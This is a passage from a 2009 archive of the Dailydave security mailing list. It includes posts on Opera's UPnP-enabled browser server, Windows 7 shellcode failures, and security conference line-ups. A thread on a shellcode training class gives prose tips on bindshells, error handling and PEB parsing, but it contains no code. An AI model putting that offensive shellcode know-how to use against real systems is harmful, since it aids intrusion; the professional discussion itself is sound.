cool, and probably why Nico uses Ant iconography so much in his presentations. Analyzing emergent behaviors is a pain in the rear, but there's a great video on it here: http://blip.tv/file/2232410/ by David Beazley, who also wrote PLY, which MOSDEF uses. Debugging is hard, but that's life. -dave -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090616/33f7f842/attachment.htm From rqdq at hushmail.com Tue Jun 16 14:22:20 2009 From: rqdq at hushmail.com (RQDQ) Date: Tue, 16 Jun 2009 20:22:20 +0200 Subject: [Dailydave] web browser cloud computing (Opera with upnp) Message-ID: <20090616182220.19993B0057@smtp.hushmail.com> The norwegians are up to something... Opera launched this today: http://www.opera.com/press/releases/2009/06/16/ Which is short terms sums up to be: - "Webserver" in the web browser - Launch listening applications (like chat) and share info, files, data through the browser - Other browsers connect directly to your browser and access your stuff - The browser uses upnp to configure modems, routers and other typical "home appliance" firewalls to allow remote clients to connect to it. It uses the same widget sandbox as Opera launched in 9.5, which has a nice track record for being just that, but it is still a huge step for a browser. Opera has had many features that's gone under the radar for a lot of users, so it will be interesting to see if this catches on, and if other vendors include similare features. And to see what you'll find listening when you poke this firewall port in the time to come... ---- End of message. -- See the difference a digital projector can make. Click now! http://tagline.hushmail.com/fc/BLSrjkqh9oH50Lc4JWB9nXTqy3rkVhhaWEUVweUBE3xtLDtro7oRuiJubj6/ From jdemott at crucialsecurity.com Fri Jun 26 14:16:43 2009 From: jdemott at crucialsecurity.com (Jared DeMott) Date: Fri, 26 Jun 2009 14:16:43 -0400 Subject: [Dailydave] So shellcode work is phun Message-ID: <4A45108B.5040901@crucialsecurity.com> Dear Dave, Just for phun, I sat down to test a simple popup calc shellcode on Windows 7 RC today and it pooped. I verified that it worked on XP and Vista, and thought darn ... now I'm going to have to see why it failed on Windows 7 and email H D Moore. Anyone else seen this or am I on crack today? Cheers, Jared From crioux at noctem.org Sun Jun 28 20:32:12 2009 From: crioux at noctem.org (Christien Rioux) Date: Sun, 28 Jun 2009 20:32:12 -0400 Subject: [Dailydave] SOURCE Barcelona Speaker Line-Up In-Reply-To: <5680af290906281729j1b610e68g93e3715b92534c3a@mail.gmail.com> References: <5680af290906281729j1b610e68g93e3715b92534c3a@mail.gmail.com> Message-ID: <5680af290906281732n5548d6fdnb2fbd3e70d04e561@mail.gmail.com> SOURCE Barcelona 2009 Announcement ---------------------------------- www.sourceconference.com September 21-22, 2009 EARLY BIRD RATE EXPIRES JULY 10th // SOURCE Announces SOURCE Barcelona Speaker Line-Up // Additional Talks to be Added. Full Schedule to be Released by July 20, 2009. --------------------------------------------------------------------------------- - KEYNOTES ------------- Adam Laurie Ivan Krsti? - SESSIONS ------------- Matt Bartoldus, Gotham Digital Science - The Software Assurance Maturity Model - Introduction and Application Philippe Langois, Consumer B Gone - Shopping Cart Antitheft System Gone Wrong Peter Silberman, Mandiant and Ero Carrera - State Of Malware: Explosion of the axis of evil Bernardo Damale, Portcullis Computer Security - Expanding the Operating Control from the SQL Injection David Mortman, EchelonOne - Integrating Security Into The SDLC in 20 Slides or Less Travis Goodspeed, Radiant Machines - Half Blind Attacks against Microcontrollers Erin Jacobs, UCB, Inc - Scare them into Compliance - How Fear and Fines motivate organizations to make changes Fermin Serna - Microsoft Windows Secure Kernel Development Julio Auto - Triaging Bugs with Dynamic Dataflow Analysis Christian Ketterer and Sebastian Porst - REIL using platform-independent automated deobfuscation Vicente Diaz, S21Sec and David Barroso, S21Sec - TBA Nico Fischbach - TBA Jamie Butler, Mandiant - TBA --------------------------------------------------------------------------------- www.sourceconference.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090628/6431b943/attachment.htm From dave at kof.immunityinc.com Mon Jun 29 03:11:19 2009 From: dave at kof.immunityinc.com (Dave Aitel) Date: Mon, 29 Jun 2009 03:11:19 -0400 Subject: [Dailydave] Google has a Cloud and You have a Fog part 2 :> Message-ID: <4e1ef3e50906290011y138c263eu44cc6a2cda5c4511@mail.gmail.com> Great blog on the subject of scalability from the ops manager at Google. http://vijaygill.wordpress.com/ Article on recent talk (well worth reading): Basically, Vijay Gill is like "Yeah, you're doing it wrong" to the guys who run the infrastructure for Microsoft and Yahoo. You can't support arbitrary API's and call it a Cloud with a big C. It's awesome. http://www.theregister.co.uk/2009/06/27/google_mocks_microsoft_online_infrastructure/ Video of talk: http://www.livestream.com/gigaomtv (Click "On the shoulders of giants" from the menu, and scroll to the 9 minute mark or so where it gets interesting). Likewise, we're doing something different with this week's Shellcode training in Singapore (http://www.syscan.org/Sg/WritingWindowsShellcode.html). Instead of distributing lots of Python code and asking people to learn both Python, assembly, and shellcoding, we have a web application. The goal is to make the whole process visible and interactive. I.E. when you type in assembly on one side, it assembles it and puts it on the other side as you go. That way you can play shellcode golf and have instant feedback as to how well you're doing. At some point it's going on Google App Engine (it's Django already since everything Immunity does is) so we can train up thousands at once. Note how you don't have to care at all if you do 5, 1K, or 1M people on Google App Engine. It's because Vijay Gill is 100% right. Of course, I think hackers have the original cloud model and there's still lots of interesting work to be done there as well. :> [image: shellcode.png] -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090629/e9accf6d/attachment-0001.htm -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: image/png Size: 61335 bytes Desc: not available Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20090629/e9accf6d/attachment-0001.png From info at shakacon.org Sat Jun 27 20:07:08 2009 From: info at shakacon.org (Shakacon) Date: Sat, 27 Jun 2009 14:07:08 -1000 Subject: [Dailydave] Shakacon III - Presentations Posted to site Message-ID: <0DAB602EAD833D44B10F51A28F258A11012F52B9@helix1.secure-dna.com> Aloha from Hawaii and the Shakacon 2009 Crew: All speaker presentations have been posted to http://www.shakacon.org. Enjoy! Selected audio to be posted in the next Month or so. Shakacon the Home of: -Sun -Surf -C Shells See you next year! This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. E-mail transmission cannot be guaranteed to be secure or error-free as information could be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain viruses. The sender therefore does not accept liability for any errors or omissions in the contents of this message, which arise as a result of e-mail transmission. If verification is required please request a hard-copy version. From valsmith at attackresearch.com Tue Jun 23 00:34:15 2009 From: valsmith at attackresearch.com (val smith) Date: Mon, 22 Jun 2009 22:34:15 -0600 Subject: [Dailydave] Metasploit Track at Blackhat Message-ID: Just thought some of you might be interested, after tons of work and coordination it's official, we will have a full day Metasploit track at Black Hat this year. http://www.blackhat.com/html/bh-usa-09/bh-usa-09-schedule.html. Dino, cg, egypt, I)ruid, myself and several others will be presenting many metasploit related things from oracle hacks, to telephony, to web p0wnage. Thanks hugely to Ping for all the coordination and hard work! V. From cseagle at redshift.com Mon Jun 29 03:42:09 2009 From: cseagle at redshift.com (Chris Eagle) Date: Mon, 29 Jun 2009 00:42:09 -0700 Subject: [Dailydave] So shellcode work is phun In-Reply-To: <4A45108B.5040901@crucialsecurity.com> References: <4A45108B.5040901@crucialsecurity.com> Message-ID: <4A487051.3030102@redshift.com> Perhaps relevant: http://www.harmonysecurity.com/blog/2009/06/retrieving-kernel32s-base-address.html Chris Jared DeMott wrote: > Dear Dave, > > Just for phun, I sat down to test a simple popup calc shellcode on > Windows 7 RC today and it pooped. I verified that it worked on XP and > Vista, and thought darn ... now I'm going to have to see why it failed > on Windows 7 and email H D Moore. Anyone else seen this or am I on > crack today? > > Cheers, > Jared > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > > From dave at kof.immunityinc.com Tue Jun 30 11:28:00 2009 From: dave at kof.immunityinc.com (Dave Aitel) Date: Tue, 30 Jun 2009 11:28:00 -0400 Subject: [Dailydave] So shellcode work is phun In-Reply-To: <4A487051.3030102@redshift.com> References: <4A45108B.5040901@crucialsecurity.com> <4A487051.3030102@redshift.com> Message-ID: <4e1ef3e50906300828l6f6d93bcm309ab369242f2a08@mail.gmail.com> So today, in class, at the very end of the day, one of the students go his bindshell working. And he was connecting to it happily and quite pleased with himself and checking out his admin cmd.exe in taskmanager until we pointed out that he should probably bind to localhost instead of 0.0.0.0, at which point he got super paranoid. :> Anyways, one of the things we teach in class is to do error correction in your shellcode. That jne might cost you 2 bytes of space, but at least that 1/100th of a time when your bind() fails, you don't have to worry that you AVed some poor guy's lsass. That same thing is true for parsing the PEB and it's mighty linked lists. If you make assumptions about what order modules are loaded in, then things are going to blow up eventually. Probably not when you want them too. -dave On Mon, Jun 29, 2009 at 3:42 AM, Chris Eagle wrote: > Perhaps relevant: > > > http://www.harmonysecurity.com/blog/2009/06/retrieving-kernel32s-base-address.html > > Chris > > Jared DeMott wrote: > > Dear Dave, > > > > Just for phun, I sat down to test a simple popup calc shellcode on > > Windows 7 RC today and it pooped. I verified that it worked on XP and > > Vista, and thought darn ... now I'm going to have to see why it failed > > on Windows 7 and email H D Moore. Anyone else seen this or am I on > > crack today? > > > > Cheers, > > Jared > > _______________________________________________ > > Dailydave mailing list > > Dailydave at lists.immunitysec.com > > http://lists.immunitysec.com/mailman/listinfo/dailydave > > > > > > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20090630/7246c350/attachment.htm